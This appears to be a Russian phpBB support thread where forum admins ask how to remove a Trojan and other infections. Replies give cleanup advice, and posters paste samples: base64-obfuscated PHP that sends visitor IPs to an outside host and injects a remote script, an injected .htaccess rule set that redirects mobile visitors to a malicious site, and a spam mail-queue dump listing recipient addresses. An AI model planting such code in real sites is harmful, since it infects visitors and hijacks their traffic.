Как убить Трояна?

AdmninsCluba · Сообщение **AdmninsCluba** » 12.05.2007 16:23

обнаружено: троянская программа Trojan-Downloader.VBS.Small.dh

Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?

Спасибо.

ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли и не храним их в FTP-клиенте.
- чистим файлы Index.* или заливаем из бэкапа.

http://virusinfo.info/pravila.html

Сообщение **Sheer** » 16.01.2014 13:44

Regal писал(а):Что это за подозрительный скрипт

Это Каспер слишком подозрительный. И на старуху бывает проруха. Ничего криминального с скрипте нет. Его назначение:
Ставить/снимать все галки во всех чекбоксах при клике Отметить все :: Снять выделение
переход на страницу в пагинации, вызов pop-up окна при выборе пользователя, сворачивание/ разворачивание левого блока меню в админке и так далее.

Добавлено спустя 2 минуты 4 секунды:
Кстати в "форумном" хедере аналогичный код, так почему не ругается. Глючит он поди...

Regal · Сообщение **Regal** » 20.01.2014 6:12

Уважаемые форумчале, разобрался! Может кому пригодиться!.

Я позвонил и написал в вирусную лабораторию Касперского. Оказывается вновь зарегеный мной домен был в черном списке! Я написал заявку на ложное срабатывание антивируса. Они удалили из черного списка, теперь все нормально!

Спасибо всем, кто откликнулся!

vulkan3 · Сообщение **vulkan3** » 19.03.2014 16:39

а у меня спам идет какой то не пойму в ispmgr в Почтовая очередь

кто то спам шлет не знаю как избавиться, вроде антивирус не нашел ничего подозрительного

типа такого сообщения

Код: Выделить всё

1WQKA0-0005mF-05-H
exim 93 93
<support@pritoc.org>
1395249612 0
-helo_name pritoc.org
-host_address 118.38.134.23.64861
-host_auth login
-interface_address 188.190.119.114.25
-received_protocol esmtpa
-aclc 0 8
group502
-aclc 1 0

-aclm 3 2
ok
-body_linecount 17
-max_received_linelength 70
-auth_id support@pritoc.org
-host_lookup_failed
YY krodriguez@familyaccess.net
YY f.brown@expertapa.undermeltington.nu
YY coper@fandango.com
NN chnicerst-299@familyaccess.net
NN enliang-nuaa@f5.com
YN juanmanriquez@exterran.com
NN gbcoleman@ezlink.on.ca
YY timmaurer@exemail.com.au
NY leonj@fdva.state.fl.us
NN tammarocarmela@fastwebnet.it
NN yokafms@fastaccess.net
15
timmaurer@exemail.com.au
f.brown@expertapa.undermeltington.nu
juanmanriquez@exterran.com
erickson_william@eyekiller.net
gbcoleman@ezlink.on.ca
enliang-nuaa@f5.com
kgarcia@faculty.whatcom.ctc.edu
krodriguez@familyaccess.net
chnicerst-299@familyaccess.net
coper@fandango.com
yokafms@fastaccess.net
tammarocarmela@fastwebnet.it
kosfeld@fbn-dummerstorf.de
qwewq@fdfds.com
leonj@fdva.state.fl.us

189P Received: from [118.38.134.23] (helo=pritoc.org)
	by s177.infiumhost.com with esmtpa (Exim 4.82)
	(envelope-from <support@pritoc.org>)
	id 1WQKA0-0005mF-05; Wed, 19 Mar 2014 19:20:12 +0200
043I Message-ID: <7E338DB0.A25687B3@pritoc.org>
038  Date: Wed, 19 Mar 2014 16:21:18 +0400
037F From: "support" <support@pritoc.org>
018  MIME-Version: 1.0
031T To: <timmaurer@exemail.com.au>
071  Subject: Make libido work with best-ever pills! Door-to-door delivery!
047  Content-Type: text/html;
	charset="iso-8859-1"
032  Content-Transfer-Encoding: 7bit

1WQKA0-0005mF-05-D
</HEAD>
<BODY>
In work articleinSheriff elected</FONT>
<br><br>
microbes. Ocean bar   not raising b Ministry,   </FONT>
<br><br><br>
 <a href="http://vk.com/away.php?to=http://t.co/UFszIQvBPi">Make sex
rewarding with strong medications! Coolest deals here!</a></FONT>
<br>
continued 14, on..!</FONT>
<br><br>
in toe musicaladditional Human</FONT>
<br><br>
</BODY>
</HTML>

Anvar · Сообщение **Anvar** » 19.03.2014 18:06

vulkan3, Это не спам, это pritoc~~.org~~ - Приток)) http://vk.com/ , приток с вконтакте)))
Вариант решения - Дурову претензию!

Пчелкин · Сообщение **Пчелкин** » 29.05.2014 15:36

На втором форуме уже встречаю... На тех, где РАНЕЕ стоят СП Девелопера...

Код: Выделить всё

function sql2_safe($in) {
        $rtn = base64_decode($in);
        return $rtn;
}
function collectnewss() {

      if (!isset($_COOKIE["iJijkdaMnerys"])) {
        $value = 'yadeor';
      $ip = $_SERVER['REMOTE_ADDR'];
        $get = sql2_safe("aHR0cDovL3h4eHBvcm5vLnh4dXouY29tOjg4OC9tb3ZlLnBocD9pcD0=").$ip;
      $file = @fopen ($get, "r");
      $content = @fread($file, 1000);
      @setcookie("iJijkdaMnerys", $value, time()+3600*24);
      if (!$content)
         echo sql2_safe("PHNjcmlwdCBzcmM9Imh0dHA6Ly90ZXN0Zm9ydGVzdC5jaGFuZ2VpcC5uYW1lL2dvb2dsZXN0YXQucGhwIj48L3NjcmlwdD4=");
      else 
         echo $content;

      }
}
collectnewss ();

Trojan.JS.Iframe.ahg
Читать про него....
http://vsevastyanov.ru/index.php/k2/%D1 ... -work.html

William_Laut · Сообщение **William_Laut** » 06.06.2014 21:52

Судя по логам использования почты скриптами, у меня идет рассылка. Куда капнуть и посмотреть? Подскажите пожалуйста.
Я самое главное не понял - проверить на вирусы, это как? В смысле скачать все и локально проверить что ли? У меня просто Mac и антивируса нету

Сообщение **Sheer** » 06.06.2014 22:37

William_Laut
Скачайте и сравните свои файлы с исходными из "коробки".

William_Laut · Сообщение **William_Laut** » 07.06.2014 15:45

Sheer
1. Сравнивается только руками или есть какая-то автоматическая утилита, которая покажет отличия?
2. А если я моды ставил (уже не помню где изменения то проводил, давно дело было), как отличить что вирус, а что мод?
3. Где конкретно искать? Где наиболее вероятней вирус сидит? И, самое главное, каким образом он мог прописаться в код? Я единственный админ, прав больше ни у кого нет. Какой то подозрительной активности в регистрациях вообще не вижу. Дополнительное поле при регистрации есть, боты не спамят. Версия форума актуальная. Как??

angst66 · Сообщение **angst66** » 07.06.2014 15:50

William_Laut писал(а):Сравнивается только руками или есть какая-то автоматическая утилита, которая покажет отличия?

Как убить Трояна?

Сообщение **Sheer** » 07.06.2014 16:30

angst66
У него

William_Laut писал(а):У меня просто Mac

поэтому Winmerge не прокатит.

William_Laut писал(а):или есть какая-то автоматическая утилита

Именно по причине "у меня Mас", я не знаю, вероятно для Mac тоже что-то есть.

William_Laut писал(а):Где конкретно искать?

Прежде всего index.php, index.html, ищите подозрительные java-скрипты, может где-то <iframe>. Может быть непосредственно в базе (видел и такое, во всех сообщениях в конце был присобачен скрипт). Вообще почитайте тему с самого начала.

William_Laut писал(а):Я единственный админ

И что с того? Могли пароль от FTP спереть, могли шелл залить...

Добавлено спустя 3 минуты 13 секунд:
Попробуйте это http://www.revisium.com/ai/

sdakasadist · Сообщение **sdakasadist** » 09.08.2014 11:31

Помогите пожалуйста, в .htaccess постоянно появляются строки которые переадресовывают на другой сайт, проверил на вирусы, сменил пароли, но всё равно сами появляются, что сделать?
Вот строки которые появляются.

Код: Выделить всё

RewriteEngine on



RewriteCond %{HTTP_USER_AGENT} android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} opera\ mini [NC,OR]
RewriteCond %{HTTP_USER_AGENT} blackberry [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iphone [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (pre\/|palm\ os|palm|hiptop|avantgo|plucker|xiino|blazer|elaine) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (iris|3g_t|windows\ ce|opera\ mobi|windows\ ce;\ smartphone;|windows\ ce;\ iemobile) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (mini\ 9.5|vx1000|lge\ |m800|e860|u940|ux840|compal|wireless|\ mobi|ahong|lg380|lgku|lgu900|lg210|lg47|lg920|lg840|lg370|sam-r|mg50|s55|g83|t66|vx400|mk99|d615|d763|el370|sl900|mp500|samu3|samu4|vx10|xda_|samu5|samu6|samu7|samu9|a615|b832|m881|s920|n210|s700|c-810|_h797|mob-x|sk16d|848b|mowser|s580|r800|471x|v120|rim8|c500foma:|160x|x160|480x|x640|t503|w839|i250|sprint|w398samr810|m5252|c7100|mt126|x225|s5330|s820|htil-g1|fly\ v71|s302|-x113|novarra|k610i|-three|8325rc|8352rc|sanyo|vx54|c888|nx250|n120|mtk\ |c5588|s710|t880|c5005|i;458x|p404i|s210|c5100|teleca|s940|c500|s590|foma|samsu|vx8|vx9|a1000|_mms|myx|a700|gu1100|bc831|e300|ems100|me701|me702m-three|sd588|s800|8325rc|ac831|mw200|brew\ |d88|htc\/|htc_touch|355x|m50|km100|d736|p-9521|telco|sl74|ktouch|m4u\/|me702|8325rc|kddi|phone|lg\ |sonyericsson|samsung|240x|x320|vx10|nokia|sony\ cmd|motorola|up.browser|up.link|mmp|symbian|smartphone|midp|wap|vodafone|o2|pocket|mobile|treo) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(1207|3gso|4thp|501i|502i|503i|504i|505i|506i|6310|6590|770s|802s|a\ wa|acer|acs-|airn|alav|asus|attw|au-m|aur\ |aus\ |abac|acoo|aiko|alco|alca|amoi|anex|anny|anyw|aptu|arch|argo|bell|bird|bw-n|bw-u|beck|benq|bilb|blac|c55\/|cdm-|chtm|capi|cond|craw|dall|dbte|dc-s|dica|ds-d|ds12|dait|devi|dmob|doco|dopo|el49|erk0|esl8|ez40|ez60|ez70|ezos|ezze|elai|emul|eric|ezwa|fake|fly-|fly_|g-mo|g1\ u|g560|gf-5|grun|gene|go\.w|good|grad|hcit|hd-m|hd-p|hd-t|hei-|hp\ i|hpip|hs-c|htc\ |htc-|htca|htcg|htcp|htcs|htct|htc_|haie|hita|huaw|hutc|i-20|i-go|i-ma|i230|iac|iac-|iac\/|ig01|im1k|inno|iris|jata|java|kddi|kgt|kgt\/|kpt\ |kwc-|klon|lexi|lg\ g|lg-a|lg-b|lg-c|lg-d|lg-f|lg-g|lg-k|lg-l|lg-m|lg-o|lg-p|lg-s|lg-t|lg-u|lg-w|lg\/k|lg\/l|lg\/u|lg50|lg54|lge-|lge\/|lynx|leno|m1-w|m3ga|m50\/|maui|mc01|mc21|mcca|medi|meri|mio8|mioa|mo01|mo02|mode|modo|mot\ |mot-|mt50|mtp1|mtv\ |mate|maxo|merc|mits|mobi|motv|mozz|n100|n101|n102|n202|n203|n300|n302|n500|n502|n505|n700|n701|n710|nec-|nem-|newg|neon|netf|noki|nzph|o2\ x|o2-x|opwv|owg1|opti|oran|p800|pand|pg-1|pg-2|pg-3|pg-6|pg-8|pg-c|pg13|phil|pn-2|pt-g|palm|pana|pire|pock|pose|psio|qa-a|qc-2|qc-3|qc-5|qc-7|qc07|qc12|qc21|qc32|qc60|qci-|qwap|qtek|r380|r600|raks|rim9|rove|s55\/|sage|sams|sc01|sch-|scp-|sdk\/|se47|sec-|sec0|sec1|semc|sgh-|shar|sie-|sk-0|sl45|slid|smb3|smt5|sp01|sph-|spv\ |spv-|sy01|samm|sany|sava|scoo|send|siem|smar|smit|soft|sony|t-mo|t218|t250|t600|t610|t618|tcl-|tdg-|telm|tim-|ts70|tsm-|tsm3|tsm5|tx-9|tagt|talk|teli|topl|hiba|up\.b|upg1|utst|v400|v750|veri|vk-v|vk40|vk50|vk52|vk53|vm40|vx98|virg|vite|voda|vulc|w3c\ |w3c-|wapj|wapp|wapu|wapm|wig\ |wapi|wapr|wapv|wapy|wapa|waps|wapt|winc|winw|wonu|x700|xda2|xdag|yas-|your|zte-|zeto|acs-|alav|alca|amoi|aste|audi|avan|benq|bird|blac|blaz|brew|brvw|bumb|ccwa|cell|cldc|cmd-|dang|doco|eml2|eric|fetc|hipt|http|ibro|idea|ikom|inno|ipaq|jbro|jemu|java|jigs|kddi|keji|kyoc|kyok|leno|lg-c|lg-d|lg-g|lge-|libw|m-cr|maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|mywa|nec-|newt|nok6|noki|o2im|opwv|palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|rozo|sage|sama|sams|sany|sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo|teli|tim-|tosh|treo|tsm-|upg1|upsi|vk-v|voda|vx52|vx53|vx60|vx61|vx70|vx80|vx81|vx83|vx85|wap-|wapa|wapi|wapp|wapr|webc|whit|winw|wmlb|xda-) [NC,OR]
RewriteCond %{HTTP:Accept} (text\/vnd\.wap\.wml|application\/vnd\.wap\.xhtml\+xml) [NC,OR]
RewriteCond %{HTTP:Profile} .+ [NC,OR]
RewriteCond %{HTTP:Wap-Profile} .+ [NC,OR]
RewriteCond %{HTTP:x-wap-profile} .+ [NC,OR]
RewriteCond %{HTTP:x-operamini-phone-ua} .+ [NC,OR]
RewriteCond %{HTTP:x-wap-profile-diff} .+ [NC]

RewriteCond %{QUERY_STRING} !noredirect [NC]
RewriteCond %{HTTP_USER_AGENT} !^(Mozilla\/5\.0\ \(Linux;\ U;\ Android\ 2\.2;\ en-us;\ Nexus\ One\ Build/FRF91\)\ AppleWebKit\/533\.1\ \(KHTML,\ like\ Gecko\)\ Version\/4\.0\ Mobile\ Safari\/533\.1\ offline)$ [NC]
RewriteCond %{HTTP_USER_AGENT} !(windows\.nt|bsd|x11|unix|macos|macintosh|playstation|google|yandex|bot|libwww|msn|america|avant|download|fdm|maui|webmoney|windows-media-player) [NC]

RewriteRule ^(.*)$ http://flashgamed.ru/e/9384?&mod=htaccess&dn=%{HTTP_HOST} [L,R=302]

xisp · Сообщение **xisp** » 09.08.2014 11:47

Хостер дырявый значит, или мод дырявый, или другой скрипт, кроме форума.

sdakasadist · Сообщение **sdakasadist** » 09.08.2014 11:58

Из модов phpBB mChat, NV recent topics 1.0.6, NV who was here 1.2.1, First_post_on_every_page, Adaptive_Hide_BBcodes_1_0_2, других скриптов нет, только форум.

xisp · Сообщение **xisp** » 09.08.2014 13:54

Значит пинайте хостера, если конечно "проверил на вирусы, сменил пароли," является полностью выполненным. На хостинге файлы точно чистые?

sdakasadist · Сообщение **sdakasadist** » 10.08.2014 1:00

xisp грешу на кое что, если из-за этого отпишусь, буду ждать результата.

phpBB Guru - Официальная русская поддержка форума phpBB

Как убить Трояна?

Как убить Трояна?

Re: Как убить Трояна?

Re: Как убить Трояна?

Re: Как убить Трояна?

Re: Как убить Трояна?

Re: Как убить Трояна?

Re: Как убить Трояна?

Re: Как убить Трояна?

Re: Как убить Трояна?

Re: Как убить Трояна?

Re: Как убить Трояна?

Про .htaccess

Re: Про .htaccess

Re: Про .htaccess

Re: Как убить Трояна?

Re: Как убить Трояна?